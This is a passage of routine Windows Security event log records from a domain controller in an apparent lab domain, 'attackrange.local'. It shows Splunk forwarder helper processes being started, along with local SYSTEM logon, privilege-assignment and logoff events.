Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 02:40:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263986
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xae0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:40:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263985
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b24
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:40:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263989
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x795D11
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:40:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263988
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x795D11
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51729
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:40:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263987
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x795D11
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:41:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263991
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:41:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263990
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:41:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263992
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xba0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:41:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263993
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1858
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:41:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263994
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x188c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:41:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263996
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:41:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263995
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bcc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:41:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263998
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x798B9F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51734
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:41:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263997
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x798B9F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:41:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263999
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x798B9F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:41:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264002
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7998F5
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:41:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264001
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7998F5
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51743
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:41:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264000
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7998F5
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:42:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264003
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xccc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:42:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264005
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:42:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264004
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:42:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264006
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:42:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264007
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17c0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:42:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
